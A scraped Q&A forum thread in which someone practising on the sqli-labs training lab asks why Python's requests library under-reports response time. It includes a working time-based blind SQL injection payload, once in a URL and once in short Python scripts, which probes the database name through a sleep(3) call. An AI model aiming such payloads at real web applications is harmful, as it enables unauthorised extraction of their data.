Measuring HTTP response time using the Python request library. Am I doing it right?

I am trying to artificially delay the HTTP response from a web application (this is the technique used for blind SQL injection). If the specified HTTP request is sent from the browser, the response from the web server is returned after 3 seconds (triggered by sleep (3)):

http://192.168.2.15/sqli-labs/Less-9/?id=1'+and+if+(ascii(substr(database(),+1,+1))=115,sleep(3),null)+--+

      

I am trying to do the same in Python 2.7 using the requests library. The code I have is:

import requests

payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) --+"}
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', params=payload)
roundtrip = r.elapsed.total_seconds()
print roundtrip

      

I expected the roundtrip to be 3 seconds, but instead I get values ​​0.001371, 0.001616, 0.002228, etc. Am I using the desired attribute incorrectly?

+3


source to share


2 answers


elapsed measures the time between the request being sent and the completion of parsing the response headers until a complete response is sent.

If you want to measure this time, you must measure it yourself:



import requests
import time

payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) --+"}
start = time.time()
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', params=payload)
roundtrip = time.time() - start
print roundtrip

      

+13


source


I realized that my payload should be

payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) -- "}



The last "+" character in the original payload is passed to the backend database, resulting in invalid SQL syntax. I shouldn't have done any hand-coding in the payload.

0


source







All Articles